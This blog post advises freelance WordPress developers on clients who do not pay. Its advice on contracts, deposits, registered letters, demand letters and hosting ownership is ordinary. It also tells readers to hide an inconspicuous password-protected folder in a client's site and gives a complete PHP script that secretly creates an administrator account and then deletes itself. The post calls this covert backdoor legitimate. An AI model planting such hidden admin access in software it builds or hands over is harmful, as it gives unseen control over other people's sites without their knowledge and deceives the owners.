Are you, by any chance, encountering issues with unpaid for website work, specifically on WordPress? Perhaps you’re facing a situation where a client has failed to compensate you for your services and has also changed the admin password, thereby denying your access to the completed work? This unfortunate circumstance, compounded by the absence of a solid contract, can indeed pose significant challenges in finding a resolution. In this article, I’ll be addressing the concerns surrounding non-payment for WordPress website work and outlining crucial steps to safeguard your access in case a client alters the admin credentials. Let’s delve into this critical topic.
Unpaid for Website Work? Try These proven Tips.
First and foremost, the contract plays a crucial role. It should be the cornerstone of your business. While verbal contracts might hold in Czech jurisdiction, what’s on paper is clearly defined. Avoid contracts through email exchanges or verbal agreements. Proving a verbal agreement will be very difficult. Regarding the contract itself, invest in hiring a lawyer. It’s about creating one contract that will serve as a template for all your clients. The initial cost might be higher, but if you spread the cost across 20 or more clients, its price becomes negligible in this context.
Avoid using contracts downloaded from the internet or contracts created by widely used artificial intelligence today. Such a contract doesn’t guarantee that legal loopholes won’t be found in it. Furthermore, the author of such a contract isn’t accountable, and you’ll ultimately bear all the consequences of any mistakes. So, rule number one to consider when creating websites as a business is a high-quality and “bulletproof” contract. It’ll serve as a fantastic lever for potential legal action to recover the owed amount. Assuming that legal recourse is a viable solution considering the owed amount. Because honestly, you probably won’t go to court over a fee of 300 USD for website debugging.
What not to do when a client hasn’t paid.
The problem is clear: the client hasn’t paid for the work done, and you’re wondering what steps to take. Let’s start with what you should not do. Your initial impulse might be to take down the website or publicly label the website owner as a thief or debtor. Avoid both of these options. Keep a level head, even though it might initially seem like a good idea to pressure someone into settling their debt. It’s actually quite the opposite.
If you decide to take down the completed website or, worse, publicly announce that the owner owes you money, you might find yourself in serious trouble instead. Yes, it sounds counterintuitive. However, engaging in either of these actions could lead to legal repercussions for you. In the first scenario, you could be held responsible for causing financial loss to the website owner due to a non-functioning site. In the latter, you might be accused of damaging their reputation. It might not make sense, but the law doesn’t always view it the way you’d expect.
Before you know it, you could end up on the opposite side of the fence, potentially being the one facing legal action. So, even if you’re strongly inclined to take such actions, I strongly advise against it. It could land you in substantial trouble in the end.
So, what should you do?
The first step is to officially demand payment from the debtor. I’m not talking about a phone call, text message, or email. I mean the traditional, conservative route of sending a letter. A registered letter! In it, you’ll formally request payment of the entire debt.
If the registered letter doesn’t yield results, and you have a strong contract to support your claim, you can seek legal help again. Visit a lawyer and draft what’s known as a pre-trial demand letter together. The cost of such a letter ranges from 250 USD to 300 USD. This letter will officially alert your client to the necessity of settling the debt, bearing the legal office’s insignia and all necessary legal components. Your client will see that you’re serious and legal action may follow. Many people get intimidated by this step and either arrange a repayment schedule or prefer to settle the entire amount. It’s a clear and secure initial approach in dealing with the client.
Now, how can you prevent someone from not paying you and seizing the completed website?
There are two options. The first is a deposit for the work. Before you commence any work, request a refundable deposit from the client. For instance, around 50% based on predefined terms. As the work progresses, you can contractually agree on further payments throughout the completion of the website. This is quite a common practice that helps you avoid many issues.
The second option, which can also be contractually secured, involves web hosting. Order the website under your name to become the website owner. Consequently, you’ll also own the data associated with such a website. This should also be outlined in the contract. Throughout the entire website development process, you’ll be the sole owner of the data. The domain belongs to the owner, while the website and its data belong to you. In the contract, you can stipulate that the web hosting will be transferred to the domain owner the moment you receive the full payment for your work. This transfer makes them the rightful owner. Legally, it would be challenging for them to argue that you disabled something that belongs to you. You have the full right to do so because it’s your property. The owner can redirect the domain to another server within a few minutes.
If you opt for the second option, never disclose FTP or MySQL passwords until the entire owed amount is settled. This will help you avoid many issues where the client might try to cause harm in various ways.
What to do if a client doesn’t pay for the creation of a WordPress website and has changed the administration password?
It’s an unpleasant reality, but you can defend against it. However, it’s crucial to anticipate such a scenario and prepare for it. How? By creating a safeguard. Let’s break down this safeguard point by point and aim to make it optimally secure.
- Create a secret folder within the directory structure on FTP (for instance, wp-content/secure/). Where you place this folder and what you name it is up to you. It’s best if it’s inconspicuous.
- Secure this folder with a password using the .htaccess and .htpasswd files. Nobody should be able to access this folder without the password.
- Upload a script into this folder, the code for which I’ll show you below, and name it as you wish. When you call this script through a browser, it will create a new user with administrator rights and then delete itself from FTP.
So, what can this safeguard do? You’ll have a secret folder on FTP accessible only with a password. Inside, there will be a script that creates an administrator user in WordPress. The script will then delete itself after displaying the login and password. Consequently, you regain access to the administration panel, where you can block the original user and regain control of the website. Thus, if the situation arises where the client not only refuses payment but also changes the administration password, simply call the script via the browser domain.tld/wp-content/secure/secure.php. Then, enter the password, and the script will execute. It will perform all the actions mentioned earlier.
It’s a completely legitimate and non-destructive safeguard that doesn’t damage anything but allows you to regain access to the administration panel. Brilliant, isn’t it? Moreover, due to the password protection, only you can access it, and you can practically initiate the script from anywhere.
Script for creating a new administrator in WordPress
<?php
// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your WordPress root directory and run it from your browser.
// Delete it when you're done.
require_once('wp-blog-header.php');
require_once('wp-includes/registration.php');
function generateStrongPassword($length = 15, $add_dashes = false, $available_sets = 'luds') {
$sets = array();
if(strpos($available_sets, 'l') !== false)
$sets[] = 'abcdefghjkmnpqrstuvwxyz';
if(strpos($available_sets, 'u') !== false)
$sets[] = 'ABCDEFGHJKMNPQRSTUVWXYZ';
if(strpos($available_sets, 'd') !== false)
$sets[] = '23456789';
if(strpos($available_sets, 's') !== false)
$sets[] = '!@#$%&*?';
$all = '';
$password = '';
foreach($sets as $set) {
$password .= $set[tweak_array_rand(str_split($set))];
$all .= $set;
}
$all = str_split($all);
for($i = 0; $i < $length - count($sets); $i++)
$password .= $all[tweak_array_rand($all)];
$password = str_shuffle($password);
if(!$add_dashes)
return $password;
$dash_len = floor(sqrt($length));
$dash_str = '';
while(strlen($password) > $dash_len) {
$dash_str .= substr($password, 0, $dash_len) . '-';
$password = substr($password, $dash_len);
}
$dash_str .= $password;
return $dash_str;
}
$form = "<form action='' method='POST' style='margin: 20px 0 10px 0;'><button type='submit' name='removefile'>Smazat soubor</button></form>";
// Take a array and get random index, same function of array_rand, only diference is
// intent use secure random algoritn on fail use mersene twistter, and on fail use default array_rand
function tweak_array_rand($array){
if (function_exists('random_int')) {
return random_int(0, count($array) - 1);
} elseif(function_exists('mt_rand')) {
return mt_rand(0, count($array) - 1);
} else {
return array_rand($array);
}
}
echo "<div class='wpuser'>";
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.
$newusername = 'wpuser';
$newpassword = generateStrongPassword(24);
$newemail = 'adresa@domena.koncovka';
// ----------------------------------------------------
// This is just a security precaution, to make sure the above "Config Variables"
// have been changed from their default values.
if ( $newpassword != 'YOURPASSWORD' && $newemail != 'YOUREMAIL@TEST.com' && $newusername !='YOURUSERNAME' ) {
// Check that user doesn't already exist
if ( !username_exists($newusername) && !email_exists($newemail) )
{
// Create user and set role to administrator
$user_id = wp_create_user( $newusername, $newpassword, $newemail);
if ( is_int($user_id) )
{
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role('administrator');
if(is_multisite()) {
grant_super_admin($user_id);
$sites = get_sites();
$user_info = [
"capabilities" => get_user_meta($user_id, "wp_capabilities", true),
"user_level" => get_user_meta($user_id, "wp_user_level", true)
];
foreach($sites as $site) {
update_user_meta($user_id, "wp_" . $site->blog_id . "_capabilities", $user_info['capabilities']);
update_user_meta($user_id, "wp_" . $site->blog_id . "_user_level", $user_info['user_level']);
}
}
echo '<p style="color: #428b42">Účet wpuser byl úspěšně vytvořen.</p><br>';
echo "Uživatelské jméno<br><span class='user-select-all'>" . $newusername . "</span><br>E-mailová adresa<span class='user-select-all'>" . $newemail . "</span><br>";
echo "Heslo<strong class='user-select-all'>" . $newpassword . "</strong>";
echo "<span style='font-weight:bold;color:#FF0000;margin-top:20px;'>Aktuální soubor byl smazán.</span>";
unlink(__FILE__);
}
else {
echo 'Během vytváření uživatele wpuser došlo k chybě.';
echo $form;
}
} else {
echo 'Administrátorský účet wpuser již existuje!';
echo $form;
}
}
else {
echo 'Vypadá to, že nebylo vyplněno heslo, uživatelské jméno nebo e-mail. Zkuste to znovu.';
echo $form;
}
if(isset($_POST['removefile'])) {
unlink(__FILE__);
echo "<span style='font-weight:bold;color:#FF0000'>Aktuální soubor byl smazán.</span>";
}
echo "</div>";
Unpaid for Website Work? Try These proven Tips.
Conclusion
That’s about the general advice on what to do if a client doesn’t pay for a WordPress website creation. I’ve outlined your options and what you can do beforehand, even before starting work on the website. If you encounter problems, a safeguard can come to your rescue. I hope you’ll steer clear of such a situation, but those who are prepared are rarely caught off guard. Dealing with debtors can be incredibly challenging nowadays, so it’s essential to know what actions to take and what to avoid.
Unpaid for Website Work? Try These proven Tips. FAQ
- Don’t forget the contract. A contract is essential for your business. Ensure it’s of high quality and covers all crucial aspects, such as scope of work, deadlines, price, and payment terms.
- If the client doesn’t pay, send them a registered letter demanding payment of the debt. If the letter doesn’t work, you can issue a pre-legal claim.
- If the client still refuses to pay the debt, you can take the matter to court.
Don’t take down the website and certainly don’t label the client as a debtor on it. This could land you in trouble.
- Ask for a deposit. The deposit should be at least 50% of the total price.
- Order web hosting under your name. This makes you the website owner with access to administration.
- Never provide FTP and MySQL passwords until the full payment for the completed work is received.
Create a safeguard at the beginning of website development. On FTP, create a secret folder and upload a script that creates a new admin user for you. If the client changes the password, execute the script from the secret folder. The script will create a new admin user, granting you access to the website interface again.
- Always prepare a high-quality contract before starting work on the website.
- If the client doesn’t pay, follow the steps mentioned above.
- Prepare a safeguard that helps you regain access to administration if the client changes the password.
The website is created with care for the included information. I strive to provide high-quality and useful content that helps or inspires others. If you are satisfied with my work and would like to support me, you can do so through simple options.
Subscribe to the Newsletter
Stay informed! Join our newsletter subscription and be the first to receive the latest information directly to your email inbox. Follow updates, exclusive events, and inspiring content, all delivered straight to your email.
